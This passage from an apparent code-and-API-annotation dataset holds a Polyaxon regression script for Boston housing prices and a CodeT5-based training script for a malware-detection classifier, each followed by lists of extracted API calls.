"s... | [((2511, 2546), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'prefix': '"""simufee-"""'}), "(prefix='simufee-')\n", (2527, 2546), False, 'import tempfile\n'), ((2687, 2705), 'summarizer.baselines.sume_wrap.SumeWrap', 'SumeWrap', (['language'], {}), '(language)\n', (2695, 2705), False, 'from summarizer.baselines.sume_wrap import SumeWrap\n'), ((2801, 2846), 'summarizer.baselines.sume.ConceptBasedILPSummarizer', 'sume.ConceptBasedILPSummarizer', (['""" """', 'language'], {}), "(' ', language)\n", (2831, 2846), False, 'from summarizer.baselines import sume\n'), ((3228, 3244), 'summarizer.algorithms.flight_recorder.FlightRecorder', 'FlightRecorder', ([], {}), '()\n', (3242, 3244), False, 'from summarizer.algorithms.flight_recorder import FlightRecorder, Record\n'), ((5170, 5220), 'summarizer.algorithms.feedback_graph.PageRankFeedbackGraph', 'PageRankFeedbackGraph', (['self.stemmer', 'self.language'], {}), '(self.stemmer, self.language)\n', (5191, 5220), False, 'from summarizer.algorithms.feedback_graph import SimpleNgramFeedbackGraph, PageRankFeedbackGraph\n'), ((8170, 8218), 'summarizer.utils.data_helpers.prune_ngrams', 'prune_ngrams', (['new_rejects', 'self.stoplist', 'self.N'], {}), '(new_rejects, self.stoplist, self.N)\n', (8182, 8218), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((8241, 8289), 'summarizer.utils.data_helpers.prune_ngrams', 'prune_ngrams', (['new_accepts', 'self.stoplist', 'self.N'], {}), '(new_accepts, self.stoplist, self.N)\n', (8253, 8289), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((9636, 9674), 'summarizer.utils.data_helpers.prune_ngrams', 'prune_ngrams', (['s', 'self.stoplist', 'self.N'], {}), '(s, self.stoplist, self.N)\n', (9648, 9674), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((19127, 19191), 'pulp.LpProblem', 
'pulp.LpProblem', (['self.summarizer.input_directory', 'pulp.LpMaximize'], {}), '(self.summarizer.input_directory, pulp.LpMaximize)\n', (19141, 19191), False, 'import pulp\n'), ((32083, 32100), 'numpy.where', 'np.where', (['(Y == -1)'], {}), '(Y == -1)\n', (32091, 32100), True, 'import numpy as np\n'), ((32121, 32137), 'numpy.where', 'np.where', (['(Y > -1)'], {}), '(Y > -1)\n', (32129, 32137), True, 'import numpy as np\n'), ((43073, 43091), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (43089, 43091), False, 'import tempfile\n'), ((43347, 43382), 'json.dumps', 'json.dumps', (['self.summarizer.weights'], {}), '(self.summarizer.weights)\n', (43357, 43382), False, 'import json\n'), ((43444, 43505), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {'suffix': '""".json"""', 'prefix': 'prefix', 'dir': 'dump_dir'}), "(suffix='.json', prefix=prefix, dir=dump_dir)\n", (43460, 43505), False, 'import tempfile\n'), ((43560, 43593), 'summarizer.utils.writer.write_to_file', 'write_to_file', (['json_content', 'file'], {}), '(json_content, file)\n', (43573, 43593), False, 'from summarizer.utils.writer import write_to_file\n'), ((3713, 3743), 'nltk.stem.snowball.SnowballStemmer', 'SnowballStemmer', (['self.language'], {}), '(self.language)\n', (3728, 3743), False, 'from nltk.stem.snowball import SnowballStemmer\n'), ((3832, 3862), 'nltk.stem.snowball.SnowballStemmer', 'SnowballStemmer', (['self.language'], {}), '(self.language)\n', (3847, 3862), False, 'from nltk.stem.snowball import SnowballStemmer\n'), ((3891, 3921), 'nltk.corpus.stopwords.words', 'stopwords.words', (['self.language'], {}), '(self.language)\n', (3906, 3921), False, 'from nltk.corpus import stopwords\n'), ((23974, 24000), 'pulp.value', 'pulp.value', (['prob.objective'], {}), '(prob.objective)\n', (23984, 24000), False, 'import pulp\n'), ((37069, 37091), 'numpy.array', 'np.array', (['self.fvector'], {}), '(self.fvector)\n', (37077, 37091), True, 'import numpy as np\n'), ((37112, 37186), 'sklearn.svm.SVC', 
'svm.SVC', ([], {'kernel': '"""linear"""', 'C': '(1.0)', 'probability': '(True)', 'class_weight': '"""balanced"""'}), "(kernel='linear', C=1.0, probability=True, class_weight='balanced')\n", (37119, 37186), False, 'from sklearn import svm\n'), ((168, 190), 'os.path.abspath', 'path.abspath', (['__file__'], {}), '(__file__)\n', (180, 190), True, 'import os.path as path\n'), ((7112, 7145), 'itertools.chain', 'itertools.chain', (['*summary_phrases'], {}), '(*summary_phrases)\n', (7127, 7145), False, 'import itertools\n'), ((7662, 7731), 'random.sample', 'random.sample', (['samples', 'self.allowed_number_of_feedback_per_iteration'], {}), '(samples, self.allowed_number_of_feedback_per_iteration)\n', (7675, 7731), False, 'import random\n'), ((23233, 23273), 'pulp.lpSum', 'pulp.lpSum', (['[s[j] for j in sentence_set]'], {}), '([s[j] for j in sentence_set])\n', (23243, 23273), False, 'import pulp\n'), ((23446, 23463), 'pulp.CPLEX', 'pulp.CPLEX', ([], {'msg': '(0)'}), '(msg=0)\n', (23456, 23463), False, 'import pulp\n'), ((34420, 34479), 'summarizer.utils.data_helpers.extract_ngrams2', 'extract_ngrams2', (['model', 'self.stemmer', 'self.language', 'self.N'], {}), '(model, self.stemmer, self.language, self.N)\n', (34435, 34479), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((5939, 5993), 're.search', 're.search', (["(u'(\\\\s|^)%s([\\\\s]|$)' % key)", "(u'%s' % phrase)"], {}), "(u'(\\\\s|^)%s([\\\\s]|$)' % key, u'%s' % phrase)\n", (5948, 5993), False, 'import re\n'), ((5999, 6053), 're.search', 're.search', (["(u'(\\\\s|^)%s([\\\\s]|$)' % phrase)", "(u'%s' % key)"], {}), "(u'(\\\\s|^)%s([\\\\s]|$)' % phrase, u'%s' % key)\n", (6008, 6053), False, 'import re\n'), ((7393, 7427), 'itertools.chain', 'itertools.chain', (['*summary_concepts'], {}), '(*summary_concepts)\n', (7408, 7427), False, 'import itertools\n'), ((23047, 23103), 'pulp.lpSum', 'pulp.lpSum', (['(s[j] for j in self.summarizer.w2s[tokens[k]])'], 
{}), '(s[j] for j in self.summarizer.w2s[tokens[k]])\n', (23057, 23103), False, 'import pulp\n'), ((31080, 31134), 're.search', 're.search', (["(u'(\\\\s|^)%s([\\\\s]|$)' % key)", "(u'%s' % phrase)"], {}), "(u'(\\\\s|^)%s([\\\\s]|$)' % key, u'%s' % phrase)\n", (31089, 31134), False, 'import re\n'), ((31140, 31194), 're.search', 're.search', (["(u'(\\\\s|^)%s([\\\\s]|$)' % phrase)", "(u'%s' % key)"], {}), "(u'(\\\\s|^)%s([\\\\s]|$)' % phrase, u'%s' % key)\n", (31149, 31194), False, 'import re\n'), ((23593, 23611), 'pulp.GUROBI', 'pulp.GUROBI', ([], {'msg': '(0)'}), '(msg=0)\n', (23604, 23611), False, 'import pulp\n'), ((23728, 23759), 'sys.exit', 'sys.exit', (['"""no solver specified"""'], {}), "('no solver specified')\n", (23736, 23759), False, 'import sys\n'), ((34725, 34795), 'summarizer.utils.data_helpers.get_parse_info', 'get_parse_info', (['parse_sent', 'self.stemmer', 'self.language', 'self.stoplist'], {}), '(parse_sent, self.stemmer, self.language, self.stoplist)\n', (34739, 34795), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((23675, 23691), 'pulp.GLPK', 'pulp.GLPK', ([], {'msg': '(0)'}), '(msg=0)\n', (23684, 23691), False, 'import pulp\n'), ((29445, 29459), 'numpy.array', 'np.array', (['embd'], {}), '(embd)\n', (29453, 29459), True, 'import numpy as np\n'), ((29520, 29534), 'numpy.array', 'np.array', (['[-1]'], {}), '([-1])\n', (29528, 29534), True, 'import numpy as np\n'), ((34828, 34894), 'summarizer.utils.data_helpers.prune_phrases', 'prune_phrases', (['phrases', 'self.stoplist', 'self.stemmer', 'self.language'], {}), '(phrases, self.stoplist, self.stemmer, self.language)\n', (34841, 34894), False, 'from summarizer.utils.data_helpers import prune_ngrams, extract_ngrams2, get_parse_info, prune_phrases\n'), ((25573, 25612), 're.sub', 're.sub', (['u"""[-\\\\.](\\\\s|$)"""', 'u"""\\\\1"""', 'token'], {}), "(u'[-\\\\.](\\\\s|$)', u'\\\\1', token)\n", (25579, 25612), False, 'import 
re\n'), ((25647, 25683), 're.sub', 're.sub', (['u"""([^.])[.]$"""', 'u"""\\\\1"""', 'token'], {}), "(u'([^.])[.]$', u'\\\\1', token)\n", (25653, 25683), False, 'import re\n')] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import numpy as np
from polyaxon_schemas.optimizers import SGDConfig
import polyaxon_lib as plx
import tensorflow as tf
from polyaxon_schemas.losses import MeanSquaredErrorConfig
from sklearn import datasets
from sklearn import model_selection
from sklearn import preprocessing
from tensorflow.python.estimator.inputs.numpy_io import numpy_input_fn
def main(*args):
    """Create and train an estimator for the Boston house-prices dataset.

    References:
        * This dataset concerns housing values in Boston suburbs.
          It's based on the "Boston Housing Dataset" from University of California, Irvine,
          which in turn was taken from the StatLib library maintained at Carnegie Mellon University.
        * https://archive.ics.uci.edu/ml/datasets/Housing
    """
    # Load dataset
    boston = datasets.load_boston()
    x, y = boston.data, boston.target

    # Split dataset into train / test
    x_train, x_test, y_train, y_test = model_selection.train_test_split(
        x, y, test_size=0.2, random_state=42)

    # Scale data (training set) to 0 mean and unit standard deviation.
    scaler = preprocessing.StandardScaler()
    x_train = scaler.fit_transform(x_train)

    def graph_fn(mode, features):
        # Two hidden ReLU layers, each regularised with dropout, followed by
        # a single linear output unit for regression.
        x = plx.layers.Dense(units=32, activation='relu')(features['x'])
        x = plx.layers.Dropout(rate=0.3)(x)
        x = plx.layers.Dense(units=32, activation='relu')(x)
        x = plx.layers.Dropout(rate=0.3)(x)
        # BUG FIX: the original returned Dropout(rate=0.3) applied to the
        # Dense(units=1) output, which randomly zeroes 30% of the regression
        # predictions during training. Return the linear output directly.
        return plx.layers.Dense(units=1)(x)

    def model_fn(features, labels, mode):
        # Regressor with mean-squared-error loss and plain SGD.
        model = plx.models.Regressor(
            mode, graph_fn=graph_fn,
            loss=MeanSquaredErrorConfig(),
            optimizer=SGDConfig(learning_rate=0.001),
            summaries='all')
        return model(features, labels)

    estimator = plx.estimators.Estimator(model_fn=model_fn,
                                             model_dir="/tmp/polyaxon_logs/boston")

    # Train on standardized features; labels are reshaped to (N, 1).
    estimator.train(input_fn=numpy_input_fn(
        {'x': np.asarray(x_train, dtype=np.float32)}, np.expand_dims(y_train, axis=1),
        shuffle=False, num_epochs=5000, batch_size=64))

    # Reuse the *training* scaler statistics on the held-out test split.
    x_test = scaler.transform(x_test)
    estimator.evaluate(input_fn=numpy_input_fn(
        {'x': np.asarray(x_test, dtype=np.float32)}, np.expand_dims(y_test, axis=1),
        shuffle=False, num_epochs=1, batch_size=32))


if __name__ == '__main__':
    tf.logging.set_verbosity(tf.logging.INFO)
    tf.app.run()
| [
"polyaxon_lib.layers.Dense",
"sklearn.preprocessing.StandardScaler",
"sklearn.model_selection.train_test_split",
"numpy.asarray",
"polyaxon_lib.estimators.Estimator",
"polyaxon_schemas.optimizers.SGDConfig",
"tensorflow.logging.set_verbosity",
"polyaxon_schemas.losses.MeanSquaredErrorConfig",
"numpy... | [((912, 934), 'sklearn.datasets.load_boston', 'datasets.load_boston', ([], {}), '()\n', (932, 934), False, 'from sklearn import datasets\n'), ((1051, 1121), 'sklearn.model_selection.train_test_split', 'model_selection.train_test_split', (['x', 'y'], {'test_size': '(0.2)', 'random_state': '(42)'}), '(x, y, test_size=0.2, random_state=42)\n', (1083, 1121), False, 'from sklearn import model_selection\n'), ((1216, 1246), 'sklearn.preprocessing.StandardScaler', 'preprocessing.StandardScaler', ([], {}), '()\n', (1244, 1246), False, 'from sklearn import preprocessing\n'), ((1936, 2023), 'polyaxon_lib.estimators.Estimator', 'plx.estimators.Estimator', ([], {'model_fn': 'model_fn', 'model_dir': '"""/tmp/polyaxon_logs/boston"""'}), "(model_fn=model_fn, model_dir=\n '/tmp/polyaxon_logs/boston')\n", (1960, 2023), True, 'import polyaxon_lib as plx\n'), ((2508, 2549), 'tensorflow.logging.set_verbosity', 'tf.logging.set_verbosity', (['tf.logging.INFO'], {}), '(tf.logging.INFO)\n', (2532, 2549), True, 'import tensorflow as tf\n'), ((2554, 2566), 'tensorflow.app.run', 'tf.app.run', ([], {}), '()\n', (2564, 2566), True, 'import tensorflow as tf\n'), ((1338, 1383), 'polyaxon_lib.layers.Dense', 'plx.layers.Dense', ([], {'units': '(32)', 'activation': '"""relu"""'}), "(units=32, activation='relu')\n", (1354, 1383), True, 'import polyaxon_lib as plx\n'), ((1411, 1439), 'polyaxon_lib.layers.Dropout', 'plx.layers.Dropout', ([], {'rate': '(0.3)'}), '(rate=0.3)\n', (1429, 1439), True, 'import polyaxon_lib as plx\n'), ((1455, 1500), 'polyaxon_lib.layers.Dense', 'plx.layers.Dense', ([], {'units': '(32)', 'activation': '"""relu"""'}), "(units=32, activation='relu')\n", (1471, 1500), True, 'import polyaxon_lib as plx\n'), ((1516, 1544), 'polyaxon_lib.layers.Dropout', 'plx.layers.Dropout', ([], {'rate': '(0.3)'}), '(rate=0.3)\n', (1534, 1544), True, 'import polyaxon_lib as plx\n'), ((1560, 1585), 'polyaxon_lib.layers.Dense', 'plx.layers.Dense', ([], {'units': '(1)'}), '(units=1)\n', 
(1576, 1585), True, 'import polyaxon_lib as plx\n'), ((1604, 1632), 'polyaxon_lib.layers.Dropout', 'plx.layers.Dropout', ([], {'rate': '(0.3)'}), '(rate=0.3)\n', (1622, 1632), True, 'import polyaxon_lib as plx\n'), ((1771, 1795), 'polyaxon_schemas.losses.MeanSquaredErrorConfig', 'MeanSquaredErrorConfig', ([], {}), '()\n', (1793, 1795), False, 'from polyaxon_schemas.losses import MeanSquaredErrorConfig\n'), ((1819, 1849), 'polyaxon_schemas.optimizers.SGDConfig', 'SGDConfig', ([], {'learning_rate': '(0.001)'}), '(learning_rate=0.001)\n', (1828, 1849), False, 'from polyaxon_schemas.optimizers import SGDConfig\n'), ((2160, 2191), 'numpy.expand_dims', 'np.expand_dims', (['y_train'], {'axis': '(1)'}), '(y_train, axis=1)\n', (2174, 2191), True, 'import numpy as np\n'), ((2390, 2420), 'numpy.expand_dims', 'np.expand_dims', (['y_test'], {'axis': '(1)'}), '(y_test, axis=1)\n', (2404, 2420), True, 'import numpy as np\n'), ((2120, 2157), 'numpy.asarray', 'np.asarray', (['x_train'], {'dtype': 'np.float32'}), '(x_train, dtype=np.float32)\n', (2130, 2157), True, 'import numpy as np\n'), ((2351, 2387), 'numpy.asarray', 'np.asarray', (['x_test'], {'dtype': 'np.float32'}), '(x_test, dtype=np.float32)\n', (2361, 2387), True, 'import numpy as np\n')] |
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for language modeling on a text file (GPT, GPT-2, BERT, RoBERTa).
GPT and GPT-2 are fine-tuned using a causal language modeling (CLM) loss while BERT and RoBERTa are fine-tuned
using a masked language modeling (MLM) loss.
"""
from __future__ import absolute_import
import os
import logging
import argparse
import math
import numpy as np
from io import open
from tqdm import tqdm
import torch
from torch.utils.tensorboard import SummaryWriter
from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from transformers import (WEIGHTS_NAME, AdamW, get_linear_schedule_with_warmup,
RobertaConfig, RobertaModel, RobertaTokenizer,
BartConfig, BartForConditionalGeneration, BartTokenizer,
T5Config, T5ForConditionalGeneration, T5Tokenizer)
import multiprocessing
import time
from models import MalwareModel
from configs import add_args, set_seed
from utils import get_filenames, get_elapse_time, load_and_cache_malware_data
from models import get_model_size
# Mapping from the --model_type CLI flag to (config class, model class,
# tokenizer class). Note that 'codet5' pairs a T5 model with the Roberta
# (BPE) tokenizer, matching the CodeT5 release.
MODEL_CLASSES = {'roberta': (RobertaConfig, RobertaModel, RobertaTokenizer),
                 't5': (T5Config, T5ForConditionalGeneration, T5Tokenizer),
                 'codet5': (T5Config, T5ForConditionalGeneration, RobertaTokenizer),
                 'bart': (BartConfig, BartForConditionalGeneration, BartTokenizer)}

# Number of CPU cores; used to size the preprocessing worker pool in main().
cpu_cont = multiprocessing.cpu_count()
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
                    datefmt='%m/%d/%Y %H:%M:%S',
                    level=logging.INFO)
# Module-level logger shared by evaluate() and main().
logger = logging.getLogger(__name__)
def evaluate(args, model, eval_examples, eval_data, write_to_pred=False):
    """Score ``model`` on ``eval_data`` and return loss/accuracy metrics.

    Returns a dict with keys ``eval_loss`` (mean per-batch loss) and
    ``eval_acc`` (accuracy rounded to 4 decimals). When ``write_to_pred``
    is True, per-example 0/1 predictions are also written to
    ``predictions.txt`` inside ``args.output_dir``.
    """
    loader = DataLoader(eval_data,
                        sampler=SequentialSampler(eval_data),
                        batch_size=args.eval_batch_size)

    logger.info("***** Running evaluation *****")
    logger.info("  Num examples = %d", len(eval_examples))
    logger.info("  Num batches = %d", len(loader))
    logger.info("  Batch size = %d", args.eval_batch_size)

    model.eval()
    loss_sum = 0.0
    step_count = 0
    logit_chunks, label_chunks = [], []
    for batch in tqdm(loader, total=len(loader), desc="Evaluating"):
        source_ids = batch[0].to(args.device)
        target = batch[1].to(args.device)
        with torch.no_grad():
            lm_loss, logit = model(source_ids, target)
            loss_sum += lm_loss.mean().item()
            logit_chunks.append(logit.cpu().numpy())
            label_chunks.append(target.cpu().numpy())
        step_count += 1

    all_logits = np.concatenate(logit_chunks, 0)
    all_labels = np.concatenate(label_chunks, 0)

    # Binary decision from the positive-class score.
    preds = all_logits[:, 1] > 0.5
    eval_acc = np.mean(all_labels == preds)
    perplexity = torch.tensor(loss_sum / step_count)

    result = {
        "eval_loss": float(perplexity),
        "eval_acc": round(eval_acc, 4),
    }

    logger.info("***** Eval results *****")
    for key in sorted(result.keys()):
        logger.info("  %s = %s", key, str(round(result[key], 4)))

    if write_to_pred:
        with open(os.path.join(args.output_dir, "predictions.txt"), 'w') as f:
            for example, pred in zip(eval_examples, preds):
                f.write(str(example.idx) + ('\t1\n' if pred else '\t0\n'))

    return result
def main():
    """Train, validate and test the malware-detection classifier.

    Driven entirely by CLI arguments (see ``configs.add_args``): sets up the
    device(s), builds the model selected via ``MODEL_CLASSES``, then runs the
    training loop with per-epoch validation, checkpointing and early stopping
    (``--do_train``/``--do_eval``), and finally evaluates the best checkpoint
    on the test split (``--do_test``).
    """
    parser = argparse.ArgumentParser()
    t0 = time.time()
    args = add_args(parser)
    logger.info(args)

    # Setup CUDA, GPU & distributed training
    if args.local_rank == -1 or args.no_cuda:
        device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
        args.n_gpu = torch.cuda.device_count()
    else:  # Initializes the distributed backend which will take care of synchronizing nodes/GPUs
        torch.cuda.set_device(args.local_rank)
        device = torch.device("cuda", args.local_rank)
        torch.distributed.init_process_group(backend='nccl')
        args.n_gpu = 1
    logger.warning("Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, cpu count: %d",
                   args.local_rank, device, args.n_gpu, bool(args.local_rank != -1), cpu_cont)
    args.device = device
    set_seed(args)

    # Build model: backbone from HuggingFace, wrapped by the project's
    # MalwareModel classification head.
    config_class, model_class, tokenizer_class = MODEL_CLASSES[args.model_type]
    config = config_class.from_pretrained(args.config_name if args.config_name else args.model_name_or_path)
    model = model_class.from_pretrained(args.model_name_or_path)
    tokenizer = tokenizer_class.from_pretrained(args.tokenizer_name)

    model = MalwareModel(model, config, tokenizer, args)
    logger.info("Finish loading model [%s] from %s", get_model_size(model), args.model_name_or_path)

    # Optionally warm-start from a previously saved state dict.
    if args.load_model_path is not None:
        logger.info("Reload model from {}".format(args.load_model_path))
        model.load_state_dict(torch.load(args.load_model_path))

    model.to(device)

    # Worker pool for dataset preprocessing/tokenization.
    pool = multiprocessing.Pool(cpu_cont)
    args.train_filename, args.dev_filename, args.test_filename = get_filenames(args.data_dir, args.task, args.sub_task)
    # Append-mode run summary log shared by train and test phases.
    fa = open(os.path.join(args.output_dir, 'summary.log'), 'a+')

    if args.do_train:
        if args.n_gpu > 1:
            # multi-gpu training
            model = torch.nn.DataParallel(model)

        if args.local_rank in [-1, 0] and args.data_num == -1:
            summary_fn = '{}/{}'.format(args.summary_dir, '/'.join(args.output_dir.split('/')[1:]))
            tb_writer = SummaryWriter(summary_fn)

        # Prepare training data loader
        train_examples, train_data = load_and_cache_malware_data(args, args.train_filename, pool, tokenizer, 'train',
                                                                 is_sample=False)

        if args.local_rank == -1:
            train_sampler = RandomSampler(train_data)
        else:
            train_sampler = DistributedSampler(train_data)
        train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)

        num_train_optimization_steps = args.num_train_epochs * len(train_dataloader)
        # Evaluate/checkpoint once per epoch (guard against empty loaders).
        save_steps = max(len(train_dataloader), 1)

        # Prepare optimizer and schedule (linear warmup and decay);
        # bias and LayerNorm weights are excluded from weight decay.
        no_decay = ['bias', 'LayerNorm.weight']
        optimizer_grouped_parameters = [
            {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
             'weight_decay': args.weight_decay},
            {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
        ]
        optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
        # warmup_steps < 1 is interpreted as a fraction of total steps.
        if args.warmup_steps < 1:
            warmup_steps = num_train_optimization_steps * args.warmup_steps
        else:
            warmup_steps = int(args.warmup_steps)
        scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps,
                                                    num_training_steps=num_train_optimization_steps)

        # Start training
        train_example_num = len(train_data)
        logger.info("***** Running training *****")
        logger.info("  Num examples = %d", train_example_num)
        logger.info("  Batch size = %d", args.train_batch_size)
        logger.info("  Batch num = %d", math.ceil(train_example_num / args.train_batch_size))
        logger.info("  Num epoch = %d", args.num_train_epochs)

        global_step, best_acc = 0, 0
        not_acc_inc_cnt = 0  # epochs since validation accuracy last improved
        is_early_stop = False
        for cur_epoch in range(args.start_epoch, int(args.num_train_epochs)):
            bar = tqdm(train_dataloader, total=len(train_dataloader), desc="Training")
            nb_tr_examples, nb_tr_steps, tr_loss = 0, 0, 0
            model.train()
            for step, batch in enumerate(bar):
                batch = tuple(t.to(device) for t in batch)
                source_ids, labels = batch

                loss, logits = model(source_ids, labels)

                if args.n_gpu > 1:
                    loss = loss.mean()  # mean() to average on multi-gpu.
                if args.gradient_accumulation_steps > 1:
                    loss = loss / args.gradient_accumulation_steps
                tr_loss += loss.item()

                nb_tr_examples += source_ids.size(0)
                nb_tr_steps += 1
                loss.backward()
                torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)

                # Step the optimizer only every gradient_accumulation_steps batches.
                if nb_tr_steps % args.gradient_accumulation_steps == 0:
                    # Update parameters
                    optimizer.step()
                    optimizer.zero_grad()
                    scheduler.step()
                    global_step += 1
                    train_loss = round(tr_loss * args.gradient_accumulation_steps / nb_tr_steps, 4)
                    bar.set_description("[{}] Train loss {}".format(cur_epoch, round(train_loss, 3)))

                # Periodic validation + checkpointing (once per epoch given save_steps).
                if (step + 1) % save_steps == 0 and args.do_eval:
                    logger.info("***** CUDA.empty_cache() *****")
                    torch.cuda.empty_cache()

                    eval_examples, eval_data = load_and_cache_malware_data(args, args.dev_filename, pool, tokenizer,
                                                                           'valid', is_sample=False)

                    result = evaluate(args, model, eval_examples, eval_data)
                    eval_acc = result['eval_acc']

                    if args.data_num == -1:
                        tb_writer.add_scalar('dev_acc', round(eval_acc, 4), cur_epoch)

                    # save last checkpoint
                    last_output_dir = os.path.join(args.output_dir, 'checkpoint-last')
                    if not os.path.exists(last_output_dir):
                        os.makedirs(last_output_dir)

                    # NOTE(review): 'if True or ...' always saves the last
                    # checkpoint regardless of the flags — looks intentional
                    # but worth confirming.
                    if True or args.data_num == -1 and args.save_last_checkpoints:
                        model_to_save = model.module if hasattr(model, 'module') else model
                        output_model_file = os.path.join(last_output_dir, "pytorch_model.bin")
                        torch.save(model_to_save.state_dict(), output_model_file)
                        logger.info("Save the last model into %s", output_model_file)

                    if eval_acc > best_acc:
                        not_acc_inc_cnt = 0
                        logger.info("  Best acc: %s", round(eval_acc, 4))
                        logger.info("  " + "*" * 20)
                        fa.write("[%d] Best acc changed into %.4f\n" % (cur_epoch, round(eval_acc, 4)))
                        best_acc = eval_acc
                        # Save best checkpoint for best ppl
                        output_dir = os.path.join(args.output_dir, 'checkpoint-best-acc')
                        if not os.path.exists(output_dir):
                            os.makedirs(output_dir)
                        # NOTE(review): '... or True' always saves the best
                        # checkpoint as well — confirm this is intended.
                        if args.data_num == -1 or True:
                            model_to_save = model.module if hasattr(model, 'module') else model
                            output_model_file = os.path.join(output_dir, "pytorch_model.bin")
                            torch.save(model_to_save.state_dict(), output_model_file)
                            logger.info("Save the best ppl model into %s", output_model_file)
                    else:
                        # Early stopping: abort once accuracy has failed to
                        # improve for more than args.patience evaluations.
                        not_acc_inc_cnt += 1
                        logger.info("acc does not increase for %d epochs", not_acc_inc_cnt)
                        if not_acc_inc_cnt > args.patience:
                            logger.info("Early stop as acc do not increase for %d times", not_acc_inc_cnt)
                            fa.write("[%d] Early stop as not_acc_inc_cnt=%d\n" % (cur_epoch, not_acc_inc_cnt))
                            is_early_stop = True
                            break

                    # evaluate() switched the model to eval mode; switch back.
                    model.train()
            if is_early_stop:
                break
            logger.info("***** CUDA.empty_cache() *****")
            torch.cuda.empty_cache()

        if args.local_rank in [-1, 0] and args.data_num == -1:
            tb_writer.close()

    if args.do_test:
        logger.info("  " + "***** Testing *****")
        logger.info("  Batch size = %d", args.eval_batch_size)

        # Evaluate the best-accuracy checkpoint on the test split.
        for criteria in ['best-acc']:
            file = os.path.join(args.output_dir, 'checkpoint-{}/pytorch_model.bin'.format(criteria))
            logger.info("Reload model from {}".format(file))
            model.load_state_dict(torch.load(file))
            if args.n_gpu > 1:
                # multi-gpu training
                model = torch.nn.DataParallel(model)
            eval_examples, eval_data = load_and_cache_malware_data(args, args.test_filename, pool, tokenizer, 'test',
                                                                   False)

            result = evaluate(args, model, eval_examples, eval_data, write_to_pred=True)
            logger.info("  test_acc=%.4f", result['eval_acc'])
            logger.info("  " + "*" * 20)

            fa.write("[%s] test-acc: %.4f\n" % (criteria, result['eval_acc']))
            if args.res_fn:
                with open(args.res_fn, 'a+') as f:
                    f.write('[Time: {}] {}\n'.format(get_elapse_time(t0), file))
                    f.write("[%s] acc: %.4f\n\n" % (
                        criteria, result['eval_acc']))
    fa.close()


if __name__ == "__main__":
    main()
| [
"argparse.ArgumentParser",
"torch.utils.data.RandomSampler",
"configs.add_args",
"logging.getLogger",
"torch.cuda.device_count",
"numpy.mean",
"torch.device",
"torch.no_grad",
"os.path.join",
"multiprocessing.cpu_count",
"utils.load_and_cache_malware_data",
"torch.utils.data.DataLoader",
"to... | [((2212, 2239), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (2237, 2239), False, 'import multiprocessing\n'), ((2241, 2384), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s - %(levelname)s - %(name)s - %(message)s"""', 'datefmt': '"""%m/%d/%Y %H:%M:%S"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt=\n '%m/%d/%Y %H:%M:%S', level=logging.INFO)\n", (2260, 2384), False, 'import logging\n'), ((2424, 2451), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2441, 2451), False, 'import logging\n'), ((2547, 2575), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['eval_data'], {}), '(eval_data)\n', (2564, 2575), False, 'from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset\n'), ((2598, 2674), 'torch.utils.data.DataLoader', 'DataLoader', (['eval_data'], {'sampler': 'eval_sampler', 'batch_size': 'args.eval_batch_size'}), '(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size)\n', (2608, 2674), False, 'from torch.utils.data import DataLoader, Dataset, SequentialSampler, RandomSampler, TensorDataset\n'), ((3438, 3463), 'numpy.concatenate', 'np.concatenate', (['logits', '(0)'], {}), '(logits, 0)\n', (3452, 3463), True, 'import numpy as np\n'), ((3477, 3502), 'numpy.concatenate', 'np.concatenate', (['labels', '(0)'], {}), '(labels, 0)\n', (3491, 3502), True, 'import numpy as np\n'), ((3549, 3573), 'numpy.mean', 'np.mean', (['(labels == preds)'], {}), '(labels == preds)\n', (3556, 3573), True, 'import numpy as np\n'), ((3633, 3656), 'torch.tensor', 'torch.tensor', (['eval_loss'], {}), '(eval_loss)\n', (3645, 3656), False, 'import torch\n'), ((4275, 4300), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (4298, 4300), False, 'import argparse\n'), ((4310, 4321), 'time.time', 'time.time', ([], {}), '()\n', (4319, 4321), False, 'import 
